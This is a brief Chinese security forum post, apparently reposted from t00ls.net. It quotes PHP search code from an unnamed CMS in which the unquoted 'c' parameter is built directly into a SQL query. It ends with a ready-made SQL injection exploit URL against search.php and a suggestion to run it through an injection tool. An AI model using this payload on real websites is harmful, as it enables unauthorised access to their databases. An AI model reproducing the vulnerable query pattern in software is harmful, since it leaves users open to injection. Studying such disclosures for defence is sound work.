From:http://t00ls.net/thread-20189-1-1.html
search.php
略。。
$c = strval($_GET['c']);
$s = strval(trim($_GET['s']));
$hit = intval($hit);
略
if($c) {
$bullet = "<img src='".DOMAINPATH."template/".$GLOBALS['cfg']['template']."/images/nav_bullet.gif' width=\"4\" height=\"7\" alt=\"bullet\" />";
$channelPath = $ch->getChannelPath($channelArr); //栏目页导航路径
if($c==15) { //都是引号惹的祸。。没引号就是蛋疼
$channelType = 100;
$searchTable = 'product';
$condition = " AND (name LIKE '%$s%' OR des LIKE '%$s%')";
}
else if($c==5) {
$channelType = 40;
$searchTable = 'channel_content';
$condition = " AND (title LIKE '%$s%' OR des LIKE '%$s%')";
}
$ch->getSubChannelIdArr($c, $channelType);
$ch->channelSubIdArr[] = $c; //赋值
$channelSubIds = @join(",", $ch->channelSubIdArr);
$sql = "SELECT COUNT(*) FROM ".PREFIX.$searchTable." WHERE pid IN ($channelSubIds)"; //this...
if($s) {
// $condition .= " AND (title LIKE '%$s%' OR des LIKE '%$s%')";
$sql .= $condition;
}
$total = $db->getOne($sql);
exp http://127.0.0.1/search.php?c=15)%20and%201=%Inject_Here%%20and%201=(select%201
丢大萝卜里就行了
官方测试。。(应为我本机没安装成。。)
